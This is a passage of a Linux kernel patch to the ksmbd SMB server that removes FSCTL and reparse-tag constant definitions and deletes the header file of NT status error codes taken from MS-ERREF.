+-#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
+-/* strange that the number for this op is not sequential with previous op */
+-#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
+-#define FSCTL_REQUEST_RESUME_KEY     0x00140078
+-#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
+-#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
+-#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
+-#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC
+-#define FSCTL_COPYCHUNK              0x001440F2
+-#define FSCTL_COPYCHUNK_WRITE        0x001480F2
+-
+-#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
+-#define IO_REPARSE_TAG_HSM           0xC0000004
+-#define IO_REPARSE_TAG_SIS           0x80000007
+-
+-/* WSL reparse tags */
+-#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
+-#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
+-#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
+-#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
+-#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
+-#endif /* __KSMBD_SMBFSCTL_H */
+diff --git a/fs/ksmbd/smbstatus.h b/fs/ksmbd/smbstatus.h
+deleted file mode 100644
+index 108a8b6ed24a0..0000000000000
+--- a/fs/ksmbd/smbstatus.h
++++ /dev/null
+@@ -1,1822 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   fs/cifs/smb2status.h
+- *
+- *   SMB2 Status code (network error) definitions
+- *   Definitions are from MS-ERREF
+- *
+- *   Copyright (c) International Business Machines  Corp., 2009,2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- */
+-
+-/*
+- *  0 1 2 3 4 5 6 7 8 9 0 A B C D E F 0 1 2 3 4 5 6 7 8 9 A B C D E F
+- *  SEV C N <-------Facility--------> <------Error Status Code------>
+- *
+- *  C is set if "customer defined" error, N bit is reserved and MBZ
+- */
+-
+-#define STATUS_SEVERITY_SUCCESS cpu_to_le32(0x0000)
+-#define STATUS_SEVERITY_INFORMATIONAL cpu_to_le32(0x0001)
+-#define STATUS_SEVERITY_WARNING cpu_to_le32(0x0002)
+-#define STATUS_SEVERITY_ERROR cpu_to_le32(0x0003)
+-
+-struct ntstatus {
+-	/* Facility is the high 12 bits of the following field */
+-	__le32 Facility; /* low 2 bits Severity, next is Customer, then rsrvd */
+-	__le32 Code;
+-};
+-
+-#define STATUS_SUCCESS 0x00000000
+-#define STATUS_WAIT_0 cpu_to_le32(0x00000000)
+-#define STATUS_WAIT_1 cpu_to_le32(0x00000001)
+-#define STATUS_WAIT_2 cpu_to_le32(0x00000002)
+-#define STATUS_WAIT_3 cpu_to_le32(0x00000003)
+-#define STATUS_WAIT_63 cpu_to_le32(0x0000003F)
+-#define STATUS_ABANDONED cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_0 cpu_to_le32(0x00000080)
+-#define STATUS_ABANDONED_WAIT_63 cpu_to_le32(0x000000BF)
+-#define STATUS_USER_APC cpu_to_le32(0x000000C0)
+-#define STATUS_KERNEL_APC cpu_to_le32(0x00000100)
+-#define STATUS_ALERTED cpu_to_le32(0x00000101)
+-#define STATUS_TIMEOUT cpu_to_le32(0x00000102)
+-#define STATUS_PENDING cpu_to_le32(0x00000103)
+-#define STATUS_REPARSE cpu_to_le32(0x00000104)
+-#define STATUS_MORE_ENTRIES cpu_to_le32(0x00000105)
+-#define STATUS_NOT_ALL_ASSIGNED cpu_to_le32(0x00000106)
+-#define STATUS_SOME_NOT_MAPPED cpu_to_le32(0x00000107)
+-#define STATUS_OPLOCK_BREAK_IN_PROGRESS cpu_to_le32(0x00000108)
+-#define STATUS_VOLUME_MOUNTED cpu_to_le32(0x00000109)
+-#define STATUS_RXACT_COMMITTED cpu_to_le32(0x0000010A)
+-#define STATUS_NOTIFY_CLEANUP cpu_to_le32(0x0000010B)
+-#define STATUS_NOTIFY_ENUM_DIR cpu_to_le32(0x0000010C)
+-#define STATUS_NO_QUOTAS_FOR_ACCOUNT cpu_to_le32(0x0000010D)
+-#define STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED cpu_to_le32(0x0000010E)
+-#define STATUS_PAGE_FAULT_TRANSITION cpu_to_le32(0x00000110)
+-#define STATUS_PAGE_FAULT_DEMAND_ZERO cpu_to_le32(0x00000111)
+-#define STATUS_PAGE_FAULT_COPY_ON_WRITE cpu_to_le32(0x00000112)
+-#define STATUS_PAGE_FAULT_GUARD_PAGE cpu_to_le32(0x00000113)
+-#define STATUS_PAGE_FAULT_PAGING_FILE cpu_to_le32(0x00000114)
+-#define STATUS_CACHE_PAGE_LOCKED cpu_to_le32(0x00000115)
+-#define STATUS_CRASH_DUMP cpu_to_le32(0x00000116)
+-#define STATUS_BUFFER_ALL_ZEROS cpu_to_le32(0x00000117)
+-#define STATUS_REPARSE_OBJECT cpu_to_le32(0x00000118)
+-#define STATUS_RESOURCE_REQUIREMENTS_CHANGED cpu_to_le32(0x00000119)
+-#define STATUS_TRANSLATION_COMPLETE cpu_to_le32(0x00000120)
+-#define STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY cpu_to_le32(0x00000121)
+-#define STATUS_NOTHING_TO_TERMINATE cpu_to_le32(0x00000122)
+-#define STATUS_PROCESS_NOT_IN_JOB cpu_to_le32(0x00000123)
+-#define STATUS_PROCESS_IN_JOB cpu_to_le32(0x00000124)
+-#define STATUS_VOLSNAP_HIBERNATE_READY cpu_to_le32(0x00000125)
+-#define STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY cpu_to_le32(0x00000126)
+-#define STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED cpu_to_le32(0x00000127)
+-#define STATUS_INTERRUPT_STILL_CONNECTED cpu_to_le32(0x00000128)
+-#define STATUS_PROCESS_CLONED cpu_to_le32(0x00000129)
+-#define STATUS_FILE_LOCKED_WITH_ONLY_READERS cpu_to_le32(0x0000012A)
+-#define STATUS_FILE_LOCKED_WITH_WRITERS cpu_to_le32(0x0000012B)
+-#define STATUS_RESOURCEMANAGER_READ_ONLY cpu_to_le32(0x00000202)
+-#define STATUS_WAIT_FOR_OPLOCK cpu_to_le32(0x00000367)
+-#define DBG_EXCEPTION_HANDLED cpu_to_le32(0x00010001)
+-#define DBG_CONTINUE cpu_to_le32(0x00010002)
+-#define STATUS_FLT_IO_COMPLETE cpu_to_le32(0x001C0001)
+-#define STATUS_OBJECT_NAME_EXISTS cpu_to_le32(0x40000000)
+-#define STATUS_THREAD_WAS_SUSPENDED cpu_to_le32(0x40000001)
+-#define STATUS_WORKING_SET_LIMIT_RANGE cpu_to_le32(0x40000002)
+-#define STATUS_IMAGE_NOT_AT_BASE cpu_to_le32(0x40000003)
+-#define STATUS_RXACT_STATE_CREATED cpu_to_le32(0x40000004)
+-#define STATUS_SEGMENT_NOTIFICATION cpu_to_le32(0x40000005)
+-#define STATUS_LOCAL_USER_SESSION_KEY cpu_to_le32(0x40000006)
+-#define STATUS_BAD_CURRENT_DIRECTORY cpu_to_le32(0x40000007)
+-#define STATUS_SERIAL_MORE_WRITES cpu_to_le32(0x40000008)
+-#define STATUS_REGISTRY_RECOVERED cpu_to_le32(0x40000009)
+-#define STATUS_FT_READ_RECOVERY_FROM_BACKUP cpu_to_le32(0x4000000A)
+-#define STATUS_FT_WRITE_RECOVERY cpu_to_le32(0x4000000B)
+-#define STATUS_SERIAL_COUNTER_TIMEOUT cpu_to_le32(0x4000000C)
+-#define STATUS_NULL_LM_PASSWORD cpu_to_le32(0x4000000D)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH cpu_to_le32(0x4000000E)
+-#define STATUS_RECEIVE_PARTIAL cpu_to_le32(0x4000000F)
+-#define STATUS_RECEIVE_EXPEDITED cpu_to_le32(0x40000010)
+-#define STATUS_RECEIVE_PARTIAL_EXPEDITED cpu_to_le32(0x40000011)
+-#define STATUS_EVENT_DONE cpu_to_le32(0x40000012)
+-#define STATUS_EVENT_PENDING cpu_to_le32(0x40000013)
+-#define STATUS_CHECKING_FILE_SYSTEM cpu_to_le32(0x40000014)
+-#define STATUS_FATAL_APP_EXIT cpu_to_le32(0x40000015)
+-#define STATUS_PREDEFINED_HANDLE cpu_to_le32(0x40000016)
+-#define STATUS_WAS_UNLOCKED cpu_to_le32(0x40000017)
+-#define STATUS_SERVICE_NOTIFICATION cpu_to_le32(0x40000018)
+-#define STATUS_WAS_LOCKED cpu_to_le32(0x40000019)
+-#define STATUS_LOG_HARD_ERROR cpu_to_le32(0x4000001A)
+-#define STATUS_ALREADY_WIN32 cpu_to_le32(0x4000001B)
+-#define STATUS_WX86_UNSIMULATE cpu_to_le32(0x4000001C)
+-#define STATUS_WX86_CONTINUE cpu_to_le32(0x4000001D)
+-#define STATUS_WX86_SINGLE_STEP cpu_to_le32(0x4000001E)
+-#define STATUS_WX86_BREAKPOINT cpu_to_le32(0x4000001F)
+-#define STATUS_WX86_EXCEPTION_CONTINUE cpu_to_le32(0x40000020)
+-#define STATUS_WX86_EXCEPTION_LASTCHANCE cpu_to_le32(0x40000021)
+-#define STATUS_WX86_EXCEPTION_CHAIN cpu_to_le32(0x40000022)
+-#define STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE cpu_to_le32(0x40000023)
+-#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
+-#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
+-#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
+-#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
+-#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
+-#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
+-#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
+-#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
+-#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
+-#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
+-#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
+-#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
+-#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
+-#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
+-#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
+-#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
+-#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
+-#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
+-#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
+-#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
+-#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
+-#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
+-#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
+-#define DBG_CONTROL_C cpu_to_le32(0x40010005)
+-#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
+-#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
+-#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
+-#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
+-#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
+-#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
+-#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
+-#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
+-#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
+-#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
+-#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
+-#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
+-#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
+-#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
+-#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
+-#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
+-#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
+-#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
+-#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED	\
+-	cpu_to_le32(0x401E0351)
+-#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
+-#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
+-#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
+-#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
+-#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
+-#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
+-#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
+-#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
+-#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
+-#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
+-#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
+-#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
+-#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
+-#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
+-#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
+-#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
+-#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
+-#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
+-#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
+-#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
+-#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
+-#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
+-#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
+-#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
+-#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
+-#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
+-#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
+-#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
+-#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
+-#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
+-#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
+-#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
+-#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
+-#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
+-#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
+-#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
+-#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
+-#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
+-#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
+-#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
+-#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
+-#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
+-#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
+-#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
+-#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
+-#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
+-#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
+-#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
+-#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
+-#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
+-#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
+-#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
+-#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
+-#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
+-#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
+-#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
+-#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
+-#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
+-#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED	\
+-	cpu_to_le32(0x801B00EB)
+-#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
+-#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
+-#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
+-#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
+-#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
+-#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
+-#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
+-#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
+-#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
+-#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
+-#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
+-#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
+-#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
+-#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
+-#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
+-#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
+-#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
+-#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
+-#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
+-#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
+-#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
+-#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
+-#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
+-#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
+-#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
+-#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
+-#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
+-#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
+-#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
+-#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
+-#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
+-#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
+-#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
+-#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
+-#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
+-#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
+-#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
+-#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
+-#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
+-#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
+-#define STATUS_UNWIND cpu_to_le32(0xC0000027)
+-#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
+-#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
+-#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
+-#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
+-#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
+-#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
+-#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
+-#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
+-#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
+-#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
+-#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
+-#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
+-#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
+-#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
+-#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
+-#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
+-#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
+-#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
+-#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
+-#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
+-#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
+-#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
+-#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
+-#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
+-#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
+-#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
+-#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
+-#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
+-#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
+-#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
+-#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
+-#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
+-#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
+-#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
+-#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
+-#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
+-#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
+-#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
+-#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
+-#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
+-#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
+-#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
+-#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
+-#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
+-#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
+-#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
+-#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
+-#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
+-#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
+-#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
+-#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
+-#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
+-#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
+-#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
+-#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
+-#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
+-#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
+-#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
+-#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
+-#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
+-#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
+-#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
+-#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
+-#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
+-#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
+-#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
+-#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
+-#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
+-#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
+-#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
+-#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
+-#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
+-#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
+-#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
+-#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
+-#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
+-#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
+-#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
+-#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
+-#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
+-#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
+-#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
+-#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
+-#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
+-#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
+-#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
+-#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
+-#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
+-#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
+-#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
+-#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
+-#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
+-#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
+-#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
+-#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
+-#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
+-#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
+-#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
+-#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
+-#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
+-#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
+-#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
+-#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
